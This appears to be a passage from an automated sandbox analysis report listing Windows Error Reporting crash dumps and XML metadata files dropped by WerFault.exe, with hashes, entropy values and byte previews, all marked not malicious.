                  SHA-512:25753E701F58D7BC201790112CA4C7EF182CB77C08DCFA3D3C2AD4774C695D01EDCC985F5077297B110E91B4380B6AD3C0A25484D820CEE229F02C95B50F3297
                  Malicious:false
                  Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.3.9.1.6.<./.P.i.

                  C:\ProgramData\Microsoft\Windows\WER\Temp\WER3AB7.tmp.xml

                  Download File
                  Process:C:\Windows\SysWOW64\WerFault.exe
                  File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                  Category:dropped
                  Size (bytes):4589
                  Entropy (8bit):4.466068831721788
                  Encrypted:false
                  SSDEEP:48:cvIwWl8zs5Jg77aI9ZCjWpW8VYZYm8M4J40F7+q8xDPsJLYhsd:uIjfLI7+S7VdJvGPsFYhsd
                  MD5:9D60570EA9D1B90420634F24D1301BAA
                  SHA1:25903F75C55A310B8DB7575AF7C93EE3CE7C1780
                  SHA-256:4538AB8F41F7BA32B11A7998F404E7831F8E938D171BA008932E83134BCE296A
                  SHA-512:27A671C4D48B246D9994FFD37F8689FB931D9BF7250BD2A572B58CADCEFE103A7681D22FE45953EDC0F97C675C7FAE3845B15175ED0EBC4E52544D5C861936D2
                  Malicious:false
                  Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="405037" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

                  C:\ProgramData\Microsoft\Windows\WER\Temp\WER3C99.tmp.dmp

                  Download File
                  Process:C:\Windows\SysWOW64\WerFault.exe
                  File Type:Mini DuMP crash report, 15 streams, Wed Jul 10 15:35:05 2024, 0x1205a4 type
                  Category:dropped
                  Size (bytes):113702
                  Entropy (8bit):2.274128963240991
                  Encrypted:false
                  SSDEEP:768:21TMJ0uvp1zEIshJVSj0o5yvJcKcDUXuN4bGWcxiXo:6TMiG1zEbV9pJODUXuNvWcxi4
                  MD5:F670BFE32977EE9A0C2273D0FCE91025
                  SHA1:DEA7104F3D092D8096569400516AA37FE38D9277
                  SHA-256:C2FC3F98B2BE17B556DC75854A389480CFF1038105C790F4050A15D425C32AD0
                  SHA-512:3E477EF3AE77123538D7B6185FD4BAD62A347B86E5C2BBA63B06283B3CC365671DFE8B8C0FE71C1499FAAE0D3C2DA5D94275C79220280D18CDFCD5CDDEEF55A6
                  Malicious:false
                  Preview:MDMP..a..... .......)..f........................`...(.......<...............PJ..........`.......8...........T............+...........................!..............................................................................eJ......H"......GenuineIntel............T.......L...!..f.............................0..2...........,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.......................................................................................................................................................................................................................................................................................................................................................................................................................................

                  C:\ProgramData\Microsoft\Windows\WER\Temp\WER3D84.tmp.WERInternalMetadata.xml

                  Download File
                  Process:C:\Windows\SysWOW64\WerFault.exe
                  File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                  Category:dropped
                  Size (bytes):8342
                  Entropy (8bit):3.7000960316584295
                  Encrypted:false
                  SSDEEP:192:R6l7wVeJPC36qo6Y2DNSUlzAgmfBTrpBa89b/Hsf7Vm:R6lXJq616YwSUl0gmflX/Mfk
                  MD5:4939CFAC4359E004B9594D7201071666
                  SHA1:D7E13DDF77727E9946EBADAE497753A7201AB0F7
                  SHA-256:47AA5738143C4764C918150286B6FE548D8F2E6FBFE496935615F795DC78D3B8
                  SHA-512:CBFDAD3B359A02FD27179FA0BEBE242A5AB8979DD801FFCC4269100E98F10383B388EA00274BC044EB420C0B19797AA8A0A7BA1F249A9BB93CF5ED3F220E7378
                  Malicious:false
                  Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.3.9.1.6.<./.P.i.

                  C:\ProgramData\Microsoft\Windows\WER\Temp\WER3DA5.tmp.xml

                  Download File
                  Process:C:\Windows\SysWOW64\WerFault.exe
                  File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                  Category:dropped
                  Size (bytes):4589
                  Entropy (8bit):4.467131217726673
                  Encrypted:false
                  SSDEEP:48:cvIwWl8zs5Jg77aI9ZCjWpW8VYlYm8M4J40FG+q8xDPsJLYhsd:uIjfLI7+S7VhJSGPsFYhsd
                  MD5:5374E7F9B3E2436E433E9609427060C9
                  SHA1:61E9871E20394DEEFC89DE8AEEE5350B6919EA6C
                  SHA-256:B8D5E5C12760E9EB66FBD96F30880F025E12FA80BD600562A6B337E074CFB0FD
                  SHA-512:22D75FD9B076F953087ACC9A8692FAA5F699AECFEF6FC841ACFBB9992DAA1DA83FBEA825495F23A92C0D3ABC7585A7CCC15A579CA4007978C9AFA388EBC3E5A7
                  Malicious:false
                  Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="405037" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

                  C:\ProgramData\Microsoft\Windows\WER\Temp\WER40C0.tmp.dmp

                  Download File
                  Process:C:\Windows\SysWOW64\WerFault.exe
                  File Type:Mini DuMP crash report, 15 streams, Wed Jul 10 15:35:06 2024, 0x1205a4 type
                  Category:dropped
                  Size (bytes):114892
                  Entropy (8bit):2.1075722828047314
                  Encrypted:false
                  SSDEEP:768:xRzyxYvp163shJVSSArDEV3GaS4mUXuNhrVAn:Lyq16IVLAEVWaS4mUXuNhrVAn
                  MD5:03ED2554FDEA33B9E9166F303774F0A1
                  SHA1:BC165F2E36659E1355F284645C19F68017057DB6
                  SHA-256:F00581BD0F6256647B40C6C1CC18F8AFFAD6F9B2D7066A33C1D751514A8D344A
                  SHA-512:CDA8D97B425CA48FC6CA1AFC19DDA647740F94FF7BE385BF0381B371FF4F7467FD0EF101C7FA48D74BB98C2F8F26E04A453E766F3E68C0CAEC9788358C6989B2
                  Malicious:false
                  Preview:MDMP..a..... .......*..f............D...............X.......<.... ......T....O..........`.......8...........T...............,...........8!..........$#..............................................................................eJ.......#......GenuineIntel............T.......L...!..f.............................0..2...........,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.......................................................................................................................................................................................................................................................................................................................................................................................................................................

                  C:\ProgramData\Microsoft\Windows\WER\Temp\WER419B.tmp.WERInternalMetadata.xml

                  Download File
                  Process:C:\Windows\SysWOW64\WerFault.exe
                  File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                  Category:dropped
                  Size (bytes):8342
                  Entropy (8bit):3.700015879752446
                  Encrypted:false
                  SSDEEP:192:R6l7wVeJPC56s6Y2DRSU/h3gmfBTrpB789bEHsfUsm:R6lXJk6s6YMSU/BgmfloEMfW
                  MD5:AC646E47A774000790F8BE97EF2D3DE9
                  SHA1:F225ECD4E849604875E24BDE870DC950E7295BC5
                  SHA-256:C7D427A5C74716BCDC5F05F06F670FCD41E3A8481F1D7C576009B41515875B90
                  SHA-512:8A04211325BF43FA8344AF6513E477B6FA083DCDBADF0981175D1E4B00F58635FEAEFD7FC17AE18C2F25E7C1E085DD045F879E5F5705118E9EB08A322B869023
                  Malicious:false
                  Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.3.9.1.6.<./.P.i.

                  C:\ProgramData\Microsoft\Windows\WER\Temp\WER41BC.tmp.xml

                  Download File
                  Process:C:\Windows\SysWOW64\WerFault.exe
                  File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                  Category:dropped
                  Size (bytes):4589
                  Entropy (8bit):4.4633172977843465
                  Encrypted:false
                  SSDEEP:48:cvIwWl8zs5Jg77aI9ZCjWpW8VY9PYm8M4J40FEN+q8xDPsJLYhsd:uIjfLI7+S7V8SJ4NGPsFYhsd
                  MD5:E664332E4460CB2AE36C5B55D43DAEEE
                  SHA1:BFE0A9FF9E834ADDE09ADB24D7E61863B57590BA
                  SHA-256:C6D43B0815E6C838A558E6E7F188E57CED52FA7C59F0BA6E9D23B622A203A1A6
                  SHA-512:B8130572FC7B3DB06E11515F7328E1A4D9FE92AB9DE794044FAE32EED79C89F842AE7B517D749D9EA9F2BB3807EBA69150B770E29815C3053CC919BD4449920C
                  Malicious:false
                  Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="405037" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

                  C:\ProgramData\Microsoft\Windows\WER\Temp\WER440B.tmp.dmp

                  Download File
                  Process:C:\Windows\SysWOW64\WerFault.exe
                  File Type:Mini DuMP crash report, 15 streams, Wed Jul 10 15:35:07 2024, 0x1205a4 type
                  Category:dropped
                  Size (bytes):127228
                  Entropy (8bit):2.1664790364403794
                  Encrypted:false
                  SSDEEP:768:D+m3xVvp1+H2CshJVSxgVGbU2eTgzsQb+UXuNoSeW85mb:Dj3R1+H2hVhVc4gzsvUXuNoSeW85mb
                  MD5:938856874EF9E5ED2AA757D521D07FEE
                  SHA1:214D95D694341879473CA6B101B659394B36D52E
                  SHA-256:FA6DCEE1C7133D18A74F828E2B445734C8B4A323F9F59DF7F20CC8F92586A399
                  SHA-512:7E078D399CEA47AA5637E3CF2327B154450D795447A253E53CD20AC33F7010FC987CB3B2B4EB31BA77E5AE91146142D8021BE4C787DF8C05B0DC38BE7DE104E1
                  Malicious:false
                  Preview:MDMP..a..... .......+..f............t...........|...........<...."..........LS..........`.......8...........T............1..............@"..........,$..............................................................................eJ.......$......GenuineIntel............T.......L...!..f.............................0..2...........,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.......................................................................................................................................................................................................................................................................................................................................................................................................................................

                  C:\ProgramData\Microsoft\Windows\WER\Temp\WER44A9.tmp.WERInternalMetadata.xml

                  Download File
                  Process:C:\Windows\SysWOW64\WerFault.exe
                  File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                  Category:dropped
                  Size (bytes):8344
                  Entropy (8bit):3.6971027749150727
                  Encrypted:false
                  SSDEEP:192:R6l7wVeJPCjS6f36Y2D4SUvh3gmfBTrpBG89bBbHsfRbjm:R6lXJsS6f6Y1SUvBgmfl7BbMft6
                  MD5:60809255B464810FE71C476EE719FB27
                  SHA1:47CAE4EC0D4520FE754593E1D3E09FA583CB1DCB
                  SHA-256:C88A7694A6BA842938315071AAF5D972D780609C14E3897D517819C9B135E276
                  SHA-512:5A47150CD2D95D3F02F1D2B3C6F8C02103AC250BA744FD013F11CE26A1D8B256BDF5414F8B55B290A7CFF7467B63D7570A6DCBE126235AE8F857E1BA62030FB3
                  Malicious:false
                  Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.3.9.1.6.<./.P.i.

                  C:\ProgramData\Microsoft\Windows\WER\Temp\WER44E8.tmp.xml

                  Download File
                  Process:C:\Windows\SysWOW64\WerFault.exe
                  File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                  Category:dropped
                  Size (bytes):4589
                  Entropy (8bit):4.465642204326791
                  Encrypted:false
                  SSDEEP:48:cvIwWl8zs5Jg77aI9ZCjWpW8VYTYm8M4J40Fdo+q8xDPsJLYhsd:uIjfLI7+S7VXJJoGPsFYhsd
                  MD5:519EE97857915FCE9C7673BAED95020E
                  SHA1:2D9ADDE121CE2F319A4A5A95556B660C9DF02F12
                  SHA-256:602B76B3184E74FE441C371082871EA83FA93464FF1A159FA3C0FDE75E19CC25
                  SHA-512:32A0541FE47E6E1D47DBECF6489C3331B413D4634C56B71579C02A6241EBA6C2AF62D8DEE2DDBE2799DAEE83A2E687B81FABFC8C25BB8F78A547A225A21769EE
                  Malicious:false
                  Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="405037" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

                  C:\ProgramData\Microsoft\Windows\WER\Temp\WER4A45.tmp.dmp

                  Download File
                  Process:C:\Windows\SysWOW64\WerFault.exe
                  File Type:Mini DuMP crash report, 15 streams, Wed Jul 10 15:35:09 2024, 0x1205a4 type
                  Category:dropped
                  Size (bytes):47418
                  Entropy (8bit):2.6639693213312157
                  Encrypted:false
                  SSDEEP:384:yg/gMHHhpsQr1vp1dAaS4h0eZ9ni/XgWIDZqzaMx:DY2hpsu1vp1dA/mivgWMI9
                  MD5:0CA9ED1A542296CC1F821DDC0480E032
                  SHA1:0F3ABF09E74F3FCEF31744A082ACDF36E3E1DCB8
                  SHA-256:9A6A603B503CFA086766B2F5F8351E660BAE1E3DA348AE82CE317A6EC321A273
                  SHA-512:4955542B182068B1223558949BB0E63EB9ED794E2D9125691B413E4437824603BEE1D153004C8EC93C59C574DC7C3FCE48A8B2BC87945C4A29E34CFC94A7C349
                  Malicious:false
                  Preview:MDMP..a..... .......-..f............4........... ...H.......<...h$..........p5..........`.......8...........T............<...|...........$...........&..............................................................................eJ......('......GenuineIntel............T.......L...!..f.............................0..2...........,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.......................................................................................................................................................................................................................................................................................................................................................................................................................................

                  C:\ProgramData\Microsoft\Windows\WER\Temp\WER4B5F.tmp.WERInternalMetadata.xml

                  Download File
                  Process:C:\Windows\SysWOW64\WerFault.exe
                  File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                  Category:dropped
                  Size (bytes):8348
                  Entropy (8bit):3.6974232818236104
                  Encrypted:false
                  SSDEEP:192:R6l7wVeJPCd6fnr6Y2DySURMK0rgmfBRCpDz89bTHsfTxm:R6lXJI6fr6YfSURM5rgmf37TMfY
                  MD5:4103DFC843387CCAB02371C18295AEA6
                  SHA1:2407F874F3A5BD350A55DC2C4637FD95E357AF67
                  SHA-256:1F747C550E288AAF3336FFDA8E452F4510DC50E20DFD882E6A12DE905137435D
                  SHA-512:C30191AE7EC48E60380E656E9E410E67BD5F24C0570EB4FBBA02DEAB7CF7C30F28BF2ECB29DE25AA3FD3B6CA65380D25ADA52E7C22FF61F53C98F927AB9985AA
                  Malicious:false
                  Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.3.9.1.6.<./.P.i.

                  C:\ProgramData\Microsoft\Windows\WER\Temp\WER4B8F.tmp.xml

                  Download File
                  Process:C:\Windows\SysWOW64\WerFault.exe
                  File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                  Category:dropped
                  Size (bytes):4593
                  Entropy (8bit):4.463626074203829
                  Encrypted:false
                  SSDEEP:48:cvIwWl8zs5Jg77aI9ZCjWpW8VYuAoYm8M4J4AOqFdoSI+q8FiOXPsJLYhsd:uIjfLI7+S7VzAFJdeSI/gPsFYhsd
                  MD5:D903550EBB3CD981302F2B69F88CDFAB
                  SHA1:0A0B4FB67885ADC0D0E0AE65F01641B894252923
                  SHA-256:32E721C81EA095914EA4F4109D050C07BC91EF0DF5B0FBEF0AFB287CC6B09A16
                  SHA-512:324AB1008BEC5F596ED2B24D2E73D361C613EDB5C57D3F1C9064D8F29A049FB40F7234E92A63E6726961A1551C1D956C7A166BD9D6B271626661E2C9EF7531D0
                  Malicious:false
                  Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="405037" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

                  C:\ProgramData\Microsoft\Windows\WER\Temp\WER4F37.tmp.dmp

                  Download File
                  Process:C:\Windows\SysWOW64\WerFault.exe
                  File Type:Mini DuMP crash report, 14 streams, Wed Jul 10 15:35:10 2024, 0x1205a4 type
                  Category:dropped
                  Size (bytes):24848
                  Entropy (8bit):2.549437358568257
                  Encrypted:false
                  SSDEEP:192:axT3hKfXDoNdjeO4PK15k9nhvxw4uTIF5EE:Kh4oZSKI9nNC4QE
                  MD5:094791DC5AD18D9E748BFFCD26960A68
                  SHA1:D1E761D26B9CCD3BAEE08364EA0301E55FC22446
                  SHA-256:1932003D378B493BE8CEEFD665CC1BA760A0AC58BCA6C607B63C46A993EC625F
                  SHA-512:FBEE533063B08A07D4C356CFE7B1E12460B2BD75A5081E280CACDD1014AE8E55FCDB95442C665615928244B99B19C10F518660D75E73D341FB4EFA10DE47824E
                  Malicious:false
                  Preview:MDMP..a..... ..........f............4...............<...........<...........T.......8...........T...............hN..........8...........$...............................................................................eJ..............GenuineIntel............T...........,..f.............................0..2...........,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................

                  C:\ProgramData\Microsoft\Windows\WER\Temp\WER4FA5.tmp.WERInternalMetadata.xml

                  Download File
                  Process:C:\Windows\SysWOW64\WerFault.exe
                  File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                  Category:dropped
                  Size (bytes):8336
                  Entropy (8bit):3.6963149716048074
                  Encrypted:false
                  SSDEEP:192:R6l7wVeJz+6IjP6YPCz6XfjgmfzqppDRC89bDvsfPBm:R6lXJK6IjP6Y26Xrgmfzql7DUf0
                  MD5:E3B2BCDF9CC15B3A030CA8936C164EBC
                  SHA1:2621D1CB830582481366C9C070786A94B8F363F8
